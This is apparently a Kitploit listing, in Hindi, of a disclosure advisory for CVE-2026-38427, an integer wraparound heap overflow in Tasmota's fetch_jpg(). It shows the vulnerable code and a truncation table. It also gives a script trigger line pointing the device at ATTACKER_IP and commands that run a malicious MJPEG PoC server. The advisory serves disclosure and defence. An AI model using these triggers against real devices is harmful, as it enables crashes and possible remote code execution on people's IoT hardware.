Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-38427 — CVE-2026-38427 — Tasmota fetch_jpg() uint16_t में इंटीजर रैपअराउंड → हीप बफर ओवरफ्लो (Tasmota <= 15.3.0.3) | Kitploit
उपकरण/GitHubGitHub/sermikr0/cve-2026-38427
एम्बेडेड सिस्टम सुरक्षाIoT सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगहार्डवेयर और IoT सुरक्षाबाइनरी शोषण
GitHubsermikr0/cve-2026-38427

CVE-2026-38427

CVE-2026-38427 — Tasmota fetch_jpg() uint16_t में इंटीजर रैपअराउंड → हीप बफर ओवरफ्लो (Tasmota <= 15.3.0.3)

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-38427: Tasmota fetch_jpg() में इंटीजर रैपअराउंड → हीप बफर ओवरफ्लो

CVE: CVE-2026-38427
गंभीरता: गंभीर (CVSS 9.8)
उत्पाद: Arendst Tasmota
प्रभावित संस्करण: <= 15.3.0.3
फ़ाइल: tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino
फ़ंक्शन: fetch_jpg() — केस 2 (MJPEG फ्रेम फ़ेच)
लेखक: Saidakbarxon Maxsudxonov
प्रकटीकरण: ज़िम्मेदाराना — प्रकाशन से पहले Tasmota को रिपोर्ट किया गया


सारांश

Tasmota के स्क्रिप्टर ड्राइवर के fetch_jpg() फ़ंक्शन में एक uint16_t इंटीजर रैपअराउंड भेद्यता मौजूद है। जब कोई Tasmota डिवाइस किसी हमलावर-नियंत्रित सर्वर से MJPEG फ्रेम फ़ेच करता है, तो Content-Length हेडर मान atoi() के माध्यम से एक uint16_t वेरिएबल में पढ़ा जाता है। 65535 से अधिक मान चुपचाप रैप हो जाते हैं (उदाहरण के लिए, 65537 → 1), जिससे बहुत छोटा हीप बफर आवंटित हो जाता है। डिवाइस तब स्ट्रीम से केवल रैप किए गए बाइट्स की संख्या पढ़ता है, शेष को स्ट्रीम बफर में छोड़ देता है, जिससे हीप/स्ट्रीम स्थिति दूषित हो जाती है और क्रैश (DoS) या संभावित रिमोट कोड निष्पादन होता है।


भेद्य कोड

root@kitploit:~
// tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino

// Case 2: fetch next MJPEG frame
char inbuff[64];
stream.readBytesUntil('\n', inbuff, sizeof(inbuff));  // reads "Content-Length: 70000"
char *cp = strchr(inbuff, ':');
uint16_t size = 0;
if (cp) {
    size = atoi(cp + 1);   // atoi() returns int 70000
                            // IMPLICIT TRUNCATION: uint16_t = 70000 & 0xFFFF = 4464
}
uint8_t *buff = (uint8_t *)special_malloc(size);   // malloc(4464) — too small!
if (buff) {
    stream.readBytes(buff, size);                  // reads only 4464 bytes
                                                   // 65536 bytes remain in stream → corruption
}

इंटीजर रैपअराउंड तालिका


हमले का परिदृश्य

जो हमलावर किसी Tasmota डिवाइस को अपने HTTP सर्वर से कनेक्ट करवा सकता है (किसी दुर्भावनापूर्ण Tasmota स्क्रिप्ट या MITM के माध्यम से), वह 65535 से अधिक Content-Length मान वाले MJPEG फ्रेम भेज सकता है। डिवाइस निम्न कार्य करेगा:

  1. एक छोटा बफर आवंटित करेगा (रैप किया गया मान)
  2. डेटा का केवल एक अंश पढ़ेगा
  3. शेष बाइट्स को स्ट्रीम में छोड़कर HTTP/WiFi स्ट्रीम स्थिति को दूषित करेगा
  4. क्रैश होगा या अनिर्धारित व्यवहार प्रदर्शित करेगा, जिससे संभावित RCE हो सकता है

Tasmota स्क्रिप्ट के माध्यम से ट्रिगर:

root@kitploit:~
>D
>B
fetchjp(ATTACKER_IP:PORT/stream,0,0,1)
>1
=fetchjp(2,0,0,1)

प्रूफ ऑफ कॉन्सेप्ट

PoC एक नकली MJPEG HTTP सर्वर चलाता है जो दुर्भावनापूर्ण Content-Length मान वाले फ्रेम भेजता है:

root@kitploit:~
python3 CVE-2026-38427_poc.py --port 8889 --cl 65537
python3 CVE-2026-38427_poc.py --port 8889 --cl 131072

पूर्ण कार्यान्वयन के लिए CVE-2026-38427_poc.py देखें।


प्रभाव

  • गोपनीयता: उच्च (ESP32 पर RCE संभव)
  • अखंडता: उच्च
  • उपलब्धता: उच्च (गारंटीकृत क्रैश/रीबूट)
  • हमला वेक्टर: नेटवर्क
  • प्रमाणीकरण: कोई आवश्यकता नहीं (डिवाइस को हमलावर सर्वर से कनेक्ट करने के लिए स्क्रिप्ट किया जाना चाहिए)

समयरेखा

  • 2026-03-29: भेद्यता खोजी गई और MITRE को रिपोर्ट की गई
  • 2026-03-29: CVE-2026-38427 निर्दिष्ट किया गया
  • 2026-05-xx: Tasmota द्वारा पैच जारी किया गया (v15.3.0.4+)

संदर्भ

  • Tasmota GitHub
  • xdrv_10_scripter.ino
  • CVE-2026-38427
टूल डाउनलोड करें
Content-Length (हेडर)uint16_t मानआवंटित बफरअपठित बाइट्स
6553600 (स्किप्ड)65536
6553711 बाइट65536
7000044644464 बाइट्स65536
13107200 (स्किप्ड)131072